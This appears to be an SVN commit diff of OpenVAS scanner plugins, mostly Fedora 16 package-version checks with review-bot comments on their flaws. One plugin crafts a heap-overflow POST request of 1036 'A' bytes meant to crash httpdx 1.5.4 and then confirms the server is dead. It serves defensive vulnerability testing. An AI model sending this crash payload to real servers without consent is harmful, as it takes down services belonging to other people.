+ script_summary("Check for the Version of thunderbird-lightning");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"thunderbird-lightning", rpm:"thunderbird-lightning~1.6~1.fc16", rls:"FC16")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10822_thunderbird-lightning_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10822_thunderbird_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10822_thunderbird_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10822_thunderbird_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for thunderbird FEDORA-2012-10822
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ Mozilla Thunderbird is a standalone mail and newsgroup client.
+
+
+ Affected Software/OS:
+ thunderbird on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084178.html ";
+
+if(description)
+{
+ script_id(864561);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-26 11:09:15 +0530 (Thu, 26 Jul 2012)");
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2012-10822");
+ script_name("Fedora Update for thunderbird FEDORA-2012-10822");
+
+ script_description(desc);
+ script_summary("Check for the Version of thunderbird");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"thunderbird", rpm:"thunderbird~14.0~1.fc16", rls:"FC16")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10822_thunderbird_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10822_xulrunner_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10822_xulrunner_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10822_xulrunner_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for xulrunner FEDORA-2012-10822
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ XULRunner is a Mozilla runtime package that can be used to bootstrap XUL+XPCOM
+ applications that are as rich as Firefox and Thunderbird. It provides mechanisms
+ for installing, upgrading, and uninstalling these applications. XULRunner also
+ provides libxul, a solution which allows the embedding of Mozilla technologies
+ in other projects and products.
+
+
+ Affected Software/OS:
+ xulrunner on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084176.html ";
+
+if(description)
+{
+ script_id(864563);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-26 11:09:15 +0530 (Thu, 26 Jul 2012)");
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2012-10822");
+ script_name("Fedora Update for xulrunner FEDORA-2012-10822");
+
+ script_description(desc);
+ script_summary("Check for the Version of xulrunner");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"xulrunner", rpm:"xulrunner~14.0.1~3.fc16", rls:"FC16")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
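Review bot: The "Vulnerability Insight" paragraph in `desc` holds only the package description of XULRunner, so the text attached to `security_hole(data:res + '\n' + desc)` tells the operator nothing about what the update fixes. The description block also sets `cvss_base` to 7.5 with no `script_cve_id(...)` call, which leaves the score untraceable. The seamonkey hunk (FEDORA-2012-10829, `cvss_base` 5.0) has the same two gaps, and the nsd, puppet, bacula and dropbear hunks also use the package description as the insight text. I would replace the insight paragraph with a summary of the fixed issues from the linked package-announce message and add the advisory's CVE identifiers, or a comment such as `# No CVE listed in the advisory; score source: <reference>` when there are none.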
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10822_xulrunner_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10829_seamonkey_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10829_seamonkey_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10829_seamonkey_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for seamonkey FEDORA-2012-10829
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ SeaMonkey is an all-in-one Internet application suite. It includes
+ a browser, mail/news client, IRC client, JavaScript debugger, and
+ a tool to inspect the DOM for web pages. It is derived from the
+ application formerly known as Mozilla Application Suite.
+
+
+ Affected Software/OS:
+ seamonkey on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084243.html ";
+
+if(description)
+{
+ script_id(864569);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 11:18:01 +0530 (Mon, 30 Jul 2012)");
+ script_tag(name:"cvss_base", value:"5.0");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
+ script_tag(name:"risk_factor", value:"Medium");
+
+ script_xref(name: "FEDORA", value: "2012-10829");
+ script_name("Fedora Update for seamonkey FEDORA-2012-10829");
+
+ script_description(desc);
+ script_summary("Check for the Version of seamonkey");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"seamonkey", rpm:"seamonkey~2.11~1.fc16", rls:"FC16")) != NULL)
+ {
+ security_warning(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10829_seamonkey_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10887_nsd_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10887_nsd_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10887_nsd_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for nsd FEDORA-2012-10887
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ NSD is a complete implementation of an authoritative DNS name server.
+ For further information about what NSD is and what NSD is not please
+ consult the REQUIREMENTS document which is a part of this distribution
+ (thanks to Olaf).
+
+
+ Affected Software/OS:
+ nsd on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084372.html ";
+
+if(description)
+{
+ script_id(864577);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 11:18:13 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-2978");
+ script_tag(name:"cvss_base", value:"5.0");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_xref(name: "FEDORA", value: "2012-10887");
+ script_name("Fedora Update for nsd FEDORA-2012-10887");
+
+ script_description(desc);
+ script_summary("Check for the Version of nsd");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"nsd", rpm:"nsd~3.2.12~1.fc16", rls:"FC16")) != NULL)
+ {
+ security_warning(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10887_nsd_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10897_puppet_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10897_puppet_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10897_puppet_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,91 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for puppet FEDORA-2012-10897
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ Puppet lets you centrally manage every important aspect of your system using a
+ cross-platform specification language that manages all the separate elements
+ normally aggregated in different files, like users, cron jobs, and hosts,
+ along with obviously discrete elements like packages, services, and files.
+
+
+ Affected Software/OS:
+ puppet on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084309.html ";
+
+if(description)
+{
+ script_id(864568);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 11:17:43 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-3866", "CVE-2012-3864", "CVE-2012-3865", "CVE-2012-3867",
+ "CVE-2012-1986", "CVE-2012-1987", "CVE-2012-1988", "CVE-2012-1053",
+ "CVE-2012-1054", "CVE-2011-3872");
+ script_tag(name:"cvss_base", value:"6.9");
+ script_tag(name:"cvss_base_vector", value:"AV:L/AC:M/Au:N/C:C/I:C/A:C");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2012-10897");
+ script_name("Fedora Update for puppet FEDORA-2012-10897");
+
+ script_description(desc);
+ script_summary("Check for the Version of puppet");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"puppet", rpm:"puppet~2.6.17~2.fc16", rls:"FC16")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10897_puppet_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10929_bacula_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10929_bacula_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10929_bacula_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,91 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for bacula FEDORA-2012-10929
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ Bacula is a set of programs that allow you to manage the backup,
+ recovery, and verification of computer data across a network of
+ different computers. It is based on a client/server architecture and is
+ efficient and relatively easy to use, while offering many advanced
+ storage management features that make it easy to find and recover lost
+ or damaged files.
+
+
+ Affected Software/OS:
+ bacula on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084347.html ";
+
+if(description)
+{
+ script_id(864575);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 11:18:10 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2008-5373");
+ script_tag(name:"cvss_base", value:"6.9");
+ script_tag(name:"cvss_base_vector", value:"AV:L/AC:M/Au:N/C:C/I:C/A:C");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2012-10929");
+ script_name("Fedora Update for bacula FEDORA-2012-10929");
+
+ script_description(desc);
+ script_summary("Check for the Version of bacula");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"bacula", rpm:"bacula~5.0.3~31.fc16", rls:"FC16")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10929_bacula_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10934_dropbear_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10934_dropbear_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10934_dropbear_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,88 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for dropbear FEDORA-2012-10934
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ Dropbear is a relatively small SSH 2 server and client. Dropbear
+ is particularly useful for "embedded"-type Linux (or other Unix)
+ systems, such as wireless routers.
+
+
+ Affected Software/OS:
+ dropbear on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084354.html ";
+
+if(description)
+{
+ script_id(864567);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 11:17:42 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-0920");
+ script_tag(name:"cvss_base", value:"7.1");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:H/Au:S/C:C/I:C/A:C");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2012-10934");
+ script_name("Fedora Update for dropbear FEDORA-2012-10934");
+
+ script_description(desc);
+ script_summary("Check for the Version of dropbear");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"dropbear", rpm:"dropbear~0.55~1.fc16", rls:"FC16")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
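Review bot: The `desc` literal is opened with a double quote, and the line `is particularly useful for "embedded"-type Linux (or other Unix)` contains two more, so the string most likely ends at `for ` and the script fails to parse. As far as I know, NASL double-quoted strings have no escape syntax. Change the inner quotes to single quotes: `is particularly useful for 'embedded'-type Linux (or other Unix)`. A plugin that does not load silently drops the package check for CVE-2012-0920 on Fedora 16 hosts, so the generated files are worth a parse-only run of the NASL interpreter before commit.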
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10934_dropbear_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_httpdx_post_req_bof_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_httpdx_post_req_bof_vuln.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_httpdx_post_req_bof_vuln.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,106 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# httpdx 'POST' request Heap Based Buffer Overflow Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+SCRIPT_OID = "1.3.6.1.4.1.25623.1.0.802663";
+CPE = "cpe:/a:jasper:httpdx";
+
+if(description)
+{
+ script_oid(SCRIPT_OID);
+ script_version("$Revision$");
+ script_tag(name:"cvss_base", value:"10.0");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 12:12:12 +0530 (Mon, 30 Jul 2012)");
+ script_name("httpdx 'POST' request Heap Based Buffer Overflow Vulnerability");
+ desc = "
+ Overview: This host is running httpdx and is prone to buffer overflow
+ vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to a boundary error when processing http POST requests
+ and can be exploited to cause a heap based buffer overflow via a specially
+ crafted packet.
+
+ Impact:
+ Successful exploitation will allow remote attackers to execute arbitrary
+ code in the context of the application. Failed attacks will cause denial
+ of service conditions.
+
+ Impact Level: System/Application
+
+ Affected Software/OS:
+ httpdx version 1.5.4
+
+ Fix: No solution or patch is available as on 30th July, 2012. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://sourceforge.net/projects/httpdx/
+
+ References:
+ http://www.exploit-db.com/exploits/20120 ";
+
+ script_description(desc);
+ script_summary("Determine if httpdx is prone to a buffer overflow");
+ script_category(ACT_DENIAL);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Buffer overflow");
+ script_dependencies("gb_httpdx_server_detect.nasl");
+ script_require_keys("httpdx/installed");
+ script_require_ports("Services/www",80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("host_details.inc");
+
+## Variable Initialization
+port = 0;
+req = "";
+res = "";
+
+## Get HTTP Port
+port = get_app_port(cpe:CPE, nvt:SCRIPT_OID);
+if(! port){
+ exit(0);
+}
+
+## Construct attack Request
+crash = crap(data: "A", length: 1036);
+req = string("POST /test.pl HTTP/1.0\r\n",
+ "Host: ", get_host_name(), "\r\n",
+ "Content-Length: 1023\r\n",
+ "Content-Type: text\r\n",
+ "\r\n", crash);
+
+## Send attack request
+res = http_send_recv(port:port, data:req);
+
+## Confirm httpdx is dead
+if(http_is_dead(port:port)){
+ security_hole(port);
+}
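Review bot: The verdict rests only on `http_is_dead(port:port)` after the request, with no check that the server was answering beforehand, so a host that was already down or filtered is reported as vulnerable with `cvss_base` 10.0. Add `if(http_is_dead(port:port)) exit(0);` right after the `get_app_port()` block. gb_httpdx_wildcards_remote_dos_vuln.nasl has the same gap before its `security_warning(port)`. `res` is assigned from `http_send_recv()` but never read, so the assignment can be dropped or used to log the reply as evidence.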
Property changes on: trunk/openvas-plugins/scripts/gb_httpdx_post_req_bof_vuln.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Modified: trunk/openvas-plugins/scripts/gb_httpdx_server_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_httpdx_server_detect.nasl 2012-07-31 08:12:11 UTC (rev 13809)
+++ trunk/openvas-plugins/scripts/gb_httpdx_server_detect.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -24,38 +24,44 @@
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
+SCRIPT_OID = "1.3.6.1.4.1.25623.1.0.800960";
+
if(description)
{
- script_id(800960);
+ script_oid(SCRIPT_OID);
script_version("$Revision$");
script_tag(name:"last_modification", value:"$Date$");
script_tag(name:"creation_date", value:"2009-10-23 16:18:41 +0200 (Fri, 23 Oct 2009)");
script_tag(name:"cvss_base", value:"0.0");
script_tag(name:"risk_factor", value:"None");
script_name("httpdx Server Version Detection");
- desc = "
- Overview : This script detects the version of installed httpdx Server
- and saves the result in KB.";
+ script_tag(name:"detection", value:"remote probe");
+ script_description("Detection of httpdx Server.
- script_description(desc);
- script_family("Service detection");
+The script sends a connection request to the server and attempts to
+extract the version number from the reply.");
+
+ script_family("Product detection");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2009 Greenbone Networks GmbH");
- script_summary("Set the version of httpdx Server");
+ script_summary("Checks for the presence of httpdx");
script_dependencies("find_service.nes");
script_require_ports("Services/www", "Services/ftp", 80, 21);
exit(0);
}
+include("cpe.inc");
